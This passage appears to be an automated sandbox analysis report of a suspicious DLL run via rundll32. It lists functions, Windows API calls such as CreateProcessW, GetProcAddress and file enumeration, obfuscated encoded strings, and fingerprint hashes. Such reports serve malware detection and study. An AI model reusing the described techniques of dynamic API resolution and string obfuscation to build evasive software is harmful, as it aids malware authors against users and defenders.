                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E13A1
              • _strlen.LIBCMT ref: 6F9E2A1C
                • Part of subcall function 6F9E140F: _strlen.LIBCMT ref: 6F9E148D
                • Part of subcall function 6F9E140F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • Sleep.KERNELBASE(000005DC), ref: 6F9E2A74
              • Sleep.KERNELBASE(00007530), ref: 6F9E2A7B
              • _strlen.LIBCMT ref: 6F9E2A9A
              • _strlen.LIBCMT ref: 6F9E2AFD
                • Part of subcall function 6F9E1629: FindFirstFileW.KERNELBASE(?,00000000,F9A742C7,%s%s,00000000,00000000), ref: 6F9E16D8
                • Part of subcall function 6F9E1629: FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E2A7D
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E2983
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E2A01
              • %s%s, xrefs: 6F9E2AC1, 6F9E2AC7, 6F9E2B2A
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E2AE2
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: _strlen$AddressFileFindProcSleep$CreateEnvironmentFirstHandleModuleNextProcessVariable
              • String ID: %s%s$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 2056693606-1305241286
              • Opcode ID: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction ID: 17d94b2857fc7741f245efeb471b1fcccb32c793a4b521c6de76663591f44adb
              • Opcode Fuzzy Hash: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction Fuzzy Hash: B351FEB1904345ABD725DB60E880DEB77ECFF9924CF40492DA549932C1EB35EA05CB62
              Function 6F9E140F Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159processsleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E148D
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • _strlen.LIBCMT ref: 6F9E1573
              • Sleep.KERNELBASE(000003E8), ref: 6F9E15EB
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04480), ref: 6F9E160C
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1558
              • %s %s, xrefs: 6F9E14E4, 6F9E15CC
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E146E
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen$Sleep
              • String ID: %s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 688041527-2059495477
              • Opcode ID: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction ID: 0a2ed944832ab80346731a79398aa8db3c606314b1904ac9d2d30e768f9b2d10
              • Opcode Fuzzy Hash: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction Fuzzy Hash: CC5161B2504344BEE321DB64DC85FABB7ECEF99248F40482DB648D31C1EB74E9448B66
              Function 6F9E3013 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E305A
              • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E3074
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction ID: 2838cea00fcf763d6ca778bbbb107e5b8b1a72ecfc90231cdc09bd71a6973925
              • Opcode Fuzzy Hash: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction Fuzzy Hash: 4141B172D04714EEDB228FB5D842FAE7E79EF817A9F00411AE814562E1D731D9068FA0
              Function 6F9E30C3 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 219 6f9e30c3-6f9e30d4 call 6f9e38c0 222 6f9e30d6-6f9e30dc 219->222 223 6f9e30e5-6f9e30ec 219->223 222->223 224 6f9e30de-6f9e30e0 222->224 225 6f9e30ee-6f9e30f1 223->225 226 6f9e30f8-6f9e310c dllmain_raw 223->226 227 6f9e31be-6f9e31cd 224->227 225->226 228 6f9e30f3-6f9e30f6 225->228 229 6f9e31b5-6f9e31bc 226->229 230 6f9e3112-6f9e3123 dllmain_crt_dispatch 226->230 231 6f9e3129-6f9e313b call 6f9e1000 228->231 229->227 230->229 230->231 234 6f9e313d-6f9e313f 231->234 235 6f9e3164-6f9e3166 231->235 234->235 238 6f9e3141-6f9e315f call 6f9e1000 call 6f9e3013 dllmain_raw 234->238 236 6f9e316d-6f9e317e dllmain_crt_dispatch 235->236 237 6f9e3168-6f9e316b 235->237 236->229 239 6f9e3180-6f9e31b2 dllmain_raw 236->239 237->229 237->236 238->235 239->229
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction ID: 3cfb22a009475ad28d025200fece35524928e05d4f0d5e0287fb5159dbdaf047
              • Opcode Fuzzy Hash: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction Fuzzy Hash: 17217C72E04715EECB338F75C842EAF3E79AF81B95B00411AF8145A2E1D731DD418BA0
              Function 6F9E2F0C Relevance: 4.6, APIs: 3, Instructions: 76COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E2F59
                • Part of subcall function 6F9E385E: mydllmain.DLL1(00000001,00000000,00000001,6F9E2F5E,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001), ref: 6F9E3877
                • Part of subcall function 6F9E3428: InitializeSListHead.KERNEL32(6FA03D60,6F9E2F63,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8), ref: 6F9E342D
                • Part of subcall function 6F9EC38F: mydllmain.DLL1(?,6F9EAAAA,?,6F9EC639,6F9FB194,6F9FB198,6FA02248,00000014,6F9EC571,6FA02268,00000008,6F9EC6F9,6F9E6503,?,B586E81C,F9A742C7), ref: 6F9EC3A6
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F9E2FC3
              • mydllmain.DLL1(?,00000002,00000001,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?), ref: 6F9E2FD9
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain$Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 1337761313-0
              • Opcode ID: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction ID: b97925093bbd51652eede3a5556f00390acfe1ff0f7d462d8c0bc127fa2994aa
              • Opcode Fuzzy Hash: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction Fuzzy Hash: 5921D572A08702AADF135FB5D802FDD3F616F6637CF10481AD4856B1D2DB32D056C612
              Function 6F9F2E90 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 305 6f9f2e90-6f9f2e9e 306 6f9f2ef1 305->306 307 6f9f2ea0 305->307 308 6f9f2ef3-6f9f2ef7 306->308 309 6f9f2ea2-6f9f2ea6 307->309 310 6f9f2ea8-6f9f2eb0 mydllmain call 6f9ee688 309->310 311 6f9f2eb6-6f9f2ebc 309->311 313 6f9f2eb2-6f9f2eb4 310->313 311->309 312 6f9f2ebe-6f9f2ec1 311->312 312->306 314 6f9f2ec3-6f9f2ec5 312->314 313->311 313->312 315 6f9f2eed-6f9f2eef 314->315 316 6f9f2ec7 314->316 315->308 317 6f9f2eca-6f9f2ece 316->317 318 6f9f2ee3-6f9f2eeb 317->318 319 6f9f2ed0-6f9f2ed4 317->319 318->315 318->317 319->318 320 6f9f2ed6-6f9f2ee2 mydllmain 319->320 320->318
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction ID: 6f31454d5a35569047882b67defe9587e3a8c6f2a3edcfb6ad8386f54621df05
              • Opcode Fuzzy Hash: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction Fuzzy Hash: C301A232A0669497DF229E599CC43EAB36D9F51220B21052EEC7A6B2C0C771FC4687A0
              Function 6F9F2E87 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 287 6f9f2e87-6f9f2e9e 288 6f9f2ef1 287->288 289 6f9f2ea0 287->289 290 6f9f2ef3-6f9f2ef7 288->290 291 6f9f2ea2-6f9f2ea6 289->291 292 6f9f2ea8-6f9f2eb0 mydllmain call 6f9ee688 291->292 293 6f9f2eb6-6f9f2ebc 291->293 295 6f9f2eb2-6f9f2eb4 292->295 293->291 294 6f9f2ebe-6f9f2ec1 293->294 294->288 296 6f9f2ec3-6f9f2ec5 294->296 295->293 295->294 297 6f9f2eed-6f9f2eef 296->297 298 6f9f2ec7 296->298 297->290 299 6f9f2eca-6f9f2ece 298->299 300 6f9f2ee3-6f9f2eeb 299->300 301 6f9f2ed0-6f9f2ed4 299->301 300->297 300->299 301->300 302 6f9f2ed6-6f9f2ee2 mydllmain 301->302 302->300
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction ID: 306308cec314d3d4e74cb6ca6f566e4aeb82a701340c2a867a4e01a15f8a8999
              • Opcode Fuzzy Hash: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction Fuzzy Hash: A701FC32A066845BDF129E18DCC43AAB36C9F51224B21052EDC766F1C1C735F8468790
              Function 6F9EF9D8 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 323 6f9ef9d8-6f9ef9e3 324 6f9ef9e5-6f9ef9ef 323->324 325 6f9ef9f1-6f9ef9f7 323->325 324->325 326 6f9efa25-6f9efa30 call 6f9ee7b1 324->326 327 6f9ef9f9-6f9ef9fa 325->327 328 6f9efa10-6f9efa21 RtlAllocateHeap 325->328 332 6f9efa32-6f9efa34 326->332 327->328 329 6f9ef9fc-6f9efa03 call 6f9f3e49 328->329 330 6f9efa23 328->330 329->326 336 6f9efa05-6f9efa0e call 6f9ec30c 329->336 330->332 336->326 336->328
              APIs
              • RtlAllocateHeap.NTDLL(00000008,00000001,6F9EAAAA,?,6F9EDA5C,00000001,00000364,00000006,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7,F08BD84D), ref: 6F9EFA19
                • Part of subcall function 6F9EC30C: mydllmain.DLL1(?,00000001,?,6F9EFA0B,00000001,?,6F9EDA5C,00000001,00000364,00000006,000000FF,6F9EAAAA,6F9EAAAA,?,6F9E64D2,6F9EC1F7), ref: 6F9EC322
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AllocateHeapmydllmain
              • String ID:
              • API String ID: 2479503475-0
              • Opcode ID: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction ID: 793bc27fe7137431ded9fd8a40187b7b36361ab248c44a1d3b11f6180b3413a5
              • Opcode Fuzzy Hash: 770f530231a20ccf6c6378675263a69336955838bc26cfad333a7bc42b228042
              • Instruction Fuzzy Hash: 37F0B436345626ABEF535A26B905A9A379CBF8577CB118117AC18AE1C4FB20E40186E1
              Function 6F9E1000 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 339 6f9e1000-6f9e1005 340 6f9e100d-6f9e1014 call 6f9e2959 ExitProcess 339->340 341 6f9e1007-6f9e100a 339->341
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction ID: 9000987cb098be165034ac60058ec63f69ca38bdac99d9a8f45fba4bf5daea90
              • Opcode Fuzzy Hash: a6d17202687152cbcfb55542fb7a407863c434a54d7a9ee4ffc0fdb367169027
              • Instruction Fuzzy Hash: 16B09B3559534296E2415B60444CB1D77545F52257F04C415E169800D4CA20C0958A72

              Non-executed Functions

              Function 6F9F4000 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction ID: 6e0fe9c455517ca4ead514f86fe4a5d5c69521affc67d2775cd3a8e353982d36
              • Opcode Fuzzy Hash: 6f16893357eab88c71203644af9a81a3f4eae31f83bff0b40e1d198b84c0f35b
              • Instruction Fuzzy Hash: 96025E71E012199BDB14CFADDA806DEB7F5FF88314F14826AD915EB384D731A9428F90
              Function 6F9E3741 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E374D
              • IsDebuggerPresent.KERNEL32 ref: 6F9E3819
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E3832
              • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E383C
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
              • String ID:
              • API String ID: 254469556-0
              • Opcode ID: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction ID: a35412e01fa201132d4c5444e81ecfd5f67bf1429ad383b26fa6d6b0c2bcf7c0
              • Opcode Fuzzy Hash: 1a7f7cc68f09033e737cc48678ab252b08f60f4fc2fa83e7180a00bb4beb8df7
              • Instruction Fuzzy Hash: D6310875D05319EBDF21DFA4D949BCDBBB8AF18304F1041EAE40DAB290EB719A848F45
              Function 6F9E1274 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 137libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
              • _strlen.LIBCMT ref: 6F9E12CA
              • GetProcAddress.KERNEL32(?), ref: 6F9E1318
              • _strlen.LIBCMT ref: 6F9E1336
              • GetProcAddress.KERNEL32(?), ref: 6F9E137E
              • _strlen.LIBCMT ref: 6F9E13A1
              • GetProcAddress.KERNEL32(?), ref: 6F9E13E7
              Strings
              • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E138B
              • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E12B1
              • kernel32.dll, xrefs: 6F9E12A6
              • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1320
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AddressProc_strlen$HandleModule
              • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
              • API String ID: 3538810943-2765630095
              • Opcode ID: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction ID: d6edb42e3ec7574594b70c827e0a6a6c5876ce9c5f3f3e786e12283e5015a1b7
              • Opcode Fuzzy Hash: a05f8d45d7267224055fceed0a656bf5fe71c851f62b4e2f17c4690b53eb4f9d
              • Instruction Fuzzy Hash: 3F41A171D007489BDB26DFF4EC909AE7BB8BF69208F54842ED951D3282EB359905CB10
              Function 6F9F65F9 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 6F9F6340: CreateFileW.KERNEL32(00000000,00000000,?,6F9F66A2,?,?,00000000,?,6F9F66A2,00000000,0000000C), ref: 6F9F635D
              • GetLastError.KERNEL32 ref: 6F9F670D
              • __dosmaperr.LIBCMT ref: 6F9F6714
              • GetFileType.KERNEL32(00000000), ref: 6F9F6720
              • GetLastError.KERNEL32 ref: 6F9F672A
              • __dosmaperr.LIBCMT ref: 6F9F6733
              • CloseHandle.KERNEL32(00000000), ref: 6F9F6753
              • CloseHandle.KERNEL32(00000000), ref: 6F9F68A0
              • GetLastError.KERNEL32 ref: 6F9F68D2
              • __dosmaperr.LIBCMT ref: 6F9F68D9
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
